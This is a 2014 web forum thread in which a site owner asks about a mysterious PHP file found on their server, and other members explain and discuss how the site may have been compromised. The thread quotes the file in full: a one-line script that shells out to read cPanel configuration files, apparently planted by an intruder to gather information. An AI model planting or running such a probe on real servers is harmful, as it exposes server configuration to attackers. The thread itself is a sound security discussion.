Welcome to WebmasterWorld Guest from 50.16.78.128

Forum Moderators: phranque

Message Too Old, No Replies

Mysterious file on my server

   
7:51 am on Feb 20, 2014 (gmt 0)

5+ Year Member



Hello, yesterday a mysterious file appeared on my server - sadfsdfsdf.php. The host says they dont know anything about how it happened but I dont trust them because their customer service is really bad. The content of the file is:


<?PHP echo system('FILES=/var/cpanel/userdata/myusernamehere/*;for i in $FILES;do egrep "servername|documentroot" $i | awk \'{print $1,$2}\' | egrep "^servername|^documentroot";echo ;done'); ?>

Can anyone translate what this code means? Many thanks!
10:52 am on Feb 20, 2014 (gmt 0)

WebmasterWorld Administrator phranque is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



this script could be used to expose information about your web server configuration.

essentially it means - print out the first two fields of every row that contains "servername" or "documentroot" in any file in the /var/cpanel/userdata/myusernamehere/ directory.
11:16 am on Feb 20, 2014 (gmt 0)

5+ Year Member



Thanks. Is that something the server people put and do not want to say they did? or could it be a hack, if so what benefit a hacker can have from this info?
10:45 pm on Feb 20, 2014 (gmt 0)

WebmasterWorld Senior Member lucy24 is a WebmasterWorld Top Contributor of All Time Top Contributors Of The Month



I can't imagine the server administrators asking for information that they already have. Unless they're testing code-- and they wouldn't do that on some random customer's site!

For the hacker it's a preliminary inquiry. The information itself may or may not be useful; what they really want to know is whether they're able to get the information in the first place.

Hacking comes in many forms. What you've got here is a two-step approach. First comes the data collection, like your file, or checking whether they're able to "PUT" a file. If the first test comes up positive, they'll be back for bigger and nastier ventures.

I assume you removed the file the instant you found it. Did it come back?
12:20 am on Feb 21, 2014 (gmt 0)

WebmasterWorld Administrator phranque is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



Not only that it tells the hacker you have a cpanel installation which would allow them to take advantage of a potential cpanel vulnerability.
12:48 pm on Feb 21, 2014 (gmt 0)

5+ Year Member



Yes I removed the file and it did not come back. I also changed the password. But what else can I do to prevent further problems?
1:31 pm on Feb 21, 2014 (gmt 0)

WebmasterWorld Senior Member lucy24 is a WebmasterWorld Top Contributor of All Time Top Contributors Of The Month



The host says they dont know anything about how it happened but I dont trust them

:: twiddling thumbs ::
1:55 pm on Feb 21, 2014 (gmt 0)

5+ Year Member



Their exact reply was:

It is important to remember that when it comes to the security of your site, it is your responsibility to make sure that none of the files you upload can be hacked. The server is secure, and I assure that is not how any hacker got in, if that is what happened. If they did get it, it was through your files that you uploaded. It is highly recommended that you determine if this file is intended or not, and then make sure that you always secure your files, to insure that hackers are not able to break in through the files and upload malware. Thank you.
9:27 pm on Feb 21, 2014 (gmt 0)

WebmasterWorld Senior Member lucy24 is a WebmasterWorld Top Contributor of All Time Top Contributors Of The Month



They think it's your fault your site got hacked? Well, maybe if your FTP password is "password" and your username* is "user" ...


* Notice how in movies-- the ones where they get the password within three guesses-- they never, ever have to figure out the username first?
10:19 pm on Feb 21, 2014 (gmt 0)

WebmasterWorld Senior Member 5+ Year Member



I removed the file and it did not come back. I also changed the password. But what else can I do to prevent further problems?

Consider how they got your username and password in the first place.

One obvious possibility is a trojan on your computer.

...
10:22 pm on Feb 23, 2014 (gmt 0)

5+ Year Member



Consider how they got your username and password in the first place.
One obvious possibility is a trojan on your computer.

Another possibility is using the same username and password
in many other sites, and one of them got cracked badly.
Jonesy